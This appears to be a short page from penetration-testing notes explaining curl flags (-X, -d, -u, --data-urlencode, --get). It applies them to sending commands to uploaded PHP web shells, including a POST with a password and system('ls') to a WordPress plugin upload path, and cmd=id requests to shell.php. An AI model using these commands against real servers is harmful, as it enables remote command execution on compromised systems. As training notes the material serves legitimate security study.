Curl Command

Curl command

curl -X POST -d "password=0064bb76d86370d20793bb00572fec23&cmd=system('ls');" http://$nukem/wp-content/uploads/simple-file-list/6247.php

-X for HTTP method. [POST/GET/PUT]

-d for specifying the POST data.

URL Then comes url.

If there is HTTP LOGIN, you can specify the password in the curl command directly.

Example:

curl http://$ip/shell.php -u user:password

-u, --user user:password Server user and password

URL Encoding using Curl command.

If you upload a web shell and want to run the command using the curl command you can easily do that using the below manner.

curl "http://192.168.161.52/cmsms/uploads/shell.php" --data-urlencode 'cmd=id'

If you cannot see the output, use "--get". This tells curl the command to append the data to the URL’s query string (i.e., use GET). That way you get both URL‐encoding and a GET request.

curl --get "http://192.168.161.52/cmsms/uploads/shell.php" --data-urlencode 'cmd=id'

PreviousCompiling C exploit.NextAbusing SUID

Last updated 10 months ago